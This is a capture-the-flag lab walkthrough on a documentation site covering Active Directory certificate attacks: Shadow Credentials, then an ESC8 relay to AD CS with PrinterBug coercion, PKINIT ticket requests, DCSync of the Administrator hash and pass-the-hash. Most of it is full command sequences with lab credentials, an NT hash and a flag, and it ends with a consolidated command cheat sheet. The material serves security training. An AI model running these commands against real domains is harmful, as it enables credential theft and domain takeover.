> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-certificate/questions.md).

# Questions

## Pass the Certificate — Questions

Use this page as the quick walkthrough for the lab question.

### Q1 — Read `flag.txt` from `jpinkman`'s Desktop

**Path used:** Shadow Credentials

#### Step 1 — Install `pywhisker`

```bash
cd /home/Tools
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip3 install -r requirements.txt --break-system-packages
```

#### Step 2 — Add a key credential to `jpinkman`

```bash
cd ~
python3 /home/Tools/pywhisker/pywhisker/pywhisker.py --dc-ip 10.129.234.174 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add
```

Save the generated `.pfx` filename and password from the output.

#### Step 3 — Install `PKINITtools`

```bash
cd /home/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
cd PKINITtools
pip3 install -r requirements.txt --break-system-packages
```

#### Step 4 — Request a TGT as `jpinkman`

```bash
python3 /home/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ~/lGCwAhQt.pfx -pfx-pass 'zAht39guDjCwxqOzlly7' -dc-ip 10.129.234.174 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
```

#### Step 5 — Configure Kerberos resolution

Add the DC to `/etc/hosts`:

```bash
echo '10.129.234.174  dc01.inlanefreight.local' | sudo tee -a /etc/hosts
```

Update `/etc/krb5.conf`:

```ini
[libdefaults]
    default_realm = INLANEFREIGHT.LOCAL

[realms]
    INLANEFREIGHT.LOCAL = {
        kdc = dc01.inlanefreight.local
    }

[domain_realm]
    .inlanefreight.local = INLANEFREIGHT.LOCAL
    inlanefreight.local = INLANEFREIGHT.LOCAL
```

#### Step 6 — Load the ticket and connect

```bash
export KRB5CCNAME=/tmp/jpinkman.ccache
evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
```

#### Step 7 — Read the flag

```powershell
cd Desktop
cat flag.txt
```

**Flag:** `3d7e3dfb56b200ef715cfc300f07f3f8`

### Q2 — ESC8 → PtC → DCSync → Administrator shell

**Goal:** Get `flag.txt` from Administrator's desktop.

### Attack chain

```
Setup Impacket + ntlmrelayx listener
        ↓
Coerce DC01$ to authenticate back to the attacker
        ↓
Relay to `/certsrv` and request a certificate for DC01$
        ↓
Decode the returned PFX
        ↓
Request a TGT as DC01$ with PKINIT
        ↓
DCSync the Administrator NT hash
        ↓
Pass the hash with Evil-WinRM
        ↓
Read `flag.txt`
```

***

### Step 1 — Setup Impacket

```bash
cd ~/Tools
git clone https://github.com/fortra/impacket.git
cd impacket
python3 setup.py install
```

> Install from the repo directly. Some distro packages miss scripts like `ntlmrelayx.py`.

***

### Step 2 — Start the NTLM relay listener

```bash
wget https://github.com/fortra/impacket/raw/refs/heads/master/examples/ntlmrelayx.py
python3 ntlmrelayx.py -t http://10.129.226.35/certsrv/certfnsh.asp --adcs --smb2support --template KerberosAuthentication
```

| Flag                                | Purpose                                      |
| ----------------------------------- | -------------------------------------------- |
| `-t`                                | Relay target — the AD CS enrollment endpoint |
| `--adcs`                            | Enable AD CS relay mode                      |
| `--smb2support`                     | Accept SMB2 connections                      |
| `--template KerberosAuthentication` | Request a cert usable for PKINIT             |

> Keep this running. Use a second terminal for the next step.

***

### Step 3 — Coerce DC01 authentication with PrinterBug

```bash
wget https://github.com/dirkjanm/krbrelayx/raw/refs/heads/master/printerbug.py
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.47.245 10.10.16.41
```

This calls `MS-RPRN RpcRemoteFindFirstPrinterChangeNotification` on DC01. That forces DC01$ to authenticate back to the attacker. The relay listener then forwards that request to AD CS and receives a certificate for DC01$.

**Expected `ntlmrelayx` output:**

```
[*] Authenticating against http://.../certsrv as INLANEFREIGHT/DC01$ SUCCEED
[*] GOT CERTIFICATE! ID 8
[*] Writing PKCS#12 certificate to ./DC01$.pfx
```

The returned PFX content is Base64-encoded.

***

### Step 4 — Decode the certificate

```bash
# Paste the Base64 string into a file
echo "<BASE64_STRING>" > DC01$.pfx

# Decode it into a binary PFX
base64 -d DC01$.pfx > DC01-decoded.pfx
```

***

### Step 5 — Setup PKINITtools

```bash
cd ~/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
pip3 install -r ~/Tools/PKINITtools/requirements.txt
```

***

### Step 6 — Request a TGT as DC01$

```bash
python3 ~/Tools/PKINITtools/gettgtpkinit.py \
  -cert-pfx ./DC01-decoded.pfx \
  -dc-ip 10.129.47.245 \
  'inlanefreight.local/dc01$' \
  dc.ccache
```

| Flag                        | Purpose                        |
| --------------------------- | ------------------------------ |
| `-cert-pfx`                 | Path to the decoded binary PFX |
| `-dc-ip`                    | Domain controller IP           |
| `inlanefreight.local/dc01$` | Machine account principal      |

> This saves the Kerberos ticket to `dc.ccache`.

***

### Step 7 — DCSync as DC01$

```bash
export KRB5CCNAME=./dc.ccache
impacket-secretsdump -k -no-pass \
  -dc-ip 10.129.47.245 \
  -just-dc-user Administrator \
  'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
```

| Flag                          | Purpose                             |
| ----------------------------- | ----------------------------------- |
| `-k`                          | Use Kerberos auth from `KRB5CCNAME` |
| `-no-pass`                    | Skip the password prompt            |
| `-just-dc-user Administrator` | Dump only the Administrator account |

> This works because `DC01$` has DCSync rights by default.

**If it fails, fix DNS resolution in `/etc/hosts`:**

```bash
sudo nano /etc/hosts
```

Add:

```
10.129.47.245   DC01.INLANEFREIGHT.LOCAL
```

Then run `secretsdump` again.

**Expected output:**

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fd02e525dd676fd8ca04e200d265f20c:::
```

***

### Step 8 — Pass the hash with Evil-WinRM

```bash
evil-winrm -u Administrator -i 10.129.47.245 -H fd02e525dd676fd8ca04e200d265f20c
```

***

### Step 9 — Read the flag

```powershell
cd ..\Desktop
type flag.txt
```

***

### All commands

```bash
# Setup
cd ~/Tools
git clone https://github.com/fortra/impacket.git
cd impacket
python3 setup.py install

# Relay listener
wget https://github.com/fortra/impacket/raw/refs/heads/master/examples/ntlmrelayx.py
python3 ntlmrelayx.py -t http://<CA_IP>/certsrv/certfnsh.asp --adcs --smb2support --template KerberosAuthentication

# Coerce DC01
wget https://github.com/dirkjanm/krbrelayx/raw/refs/heads/master/printerbug.py
python3 printerbug.py DOMAIN/user:"pass"@<DC_IP> <ATTACKER_IP>

# Decode certificate
echo "<BASE64>" > DC01$.pfx
base64 -d DC01$.pfx > DC01-decoded.pfx

# PKINITtools
cd ~/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
pip3 install -r ~/Tools/PKINITtools/requirements.txt

# Get TGT
python3 ~/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ./DC01-decoded.pfx -dc-ip <DC_IP> 'domain/dc01$' dc.ccache

# DCSync
export KRB5CCNAME=./dc.ccache
impacket-secretsdump -k -no-pass -dc-ip <DC_IP> -just-dc-user Administrator 'DOMAIN/DC01$'@DC01.DOMAIN

# Shell
evil-winrm -u Administrator -i <DC_IP> -H <NT_HASH>

# Flag
cd ..\Desktop
type flag.txt
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-certificate/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
